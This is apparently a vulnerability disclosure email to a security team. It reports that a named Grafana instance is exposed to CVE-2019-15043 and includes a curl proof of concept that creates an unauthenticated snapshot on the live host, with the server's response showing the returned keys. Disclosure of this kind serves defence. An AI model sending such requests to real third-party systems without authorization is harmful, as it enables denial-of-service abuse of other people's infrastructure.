HEY SECURITY TEAM,

I'm Security Researcher

I have found a critical vulnerability at one of your domain that is cve-2019-15043
which can led to DDOS attack and can make system go down by grafana snapshot instance

Vuln url: https://grafana.opendev.org/api/snapshots

POC:

root@kali:/home/kali# curl -s XPOST https://grafana.opendev.org/api/snapshots -H "Accept: application/json" -H "Content-Type: application/json" -d '{"dashboard": {}}' | json_pp

{
"deleteKey" : "6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
"deleteUrl" : "http://localhost:3000/api/snapshots-delete/6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
"key" : "91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO",
"url" : "http://localhost:3000/dashboard/snapshot/91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO"
}

for more reference - https://aaron-hoffmann.com/blog/cve-2019-15043/

Fix it to latest grafana instance

Best Regards,

Divya Singh - @Dgirlwhohacks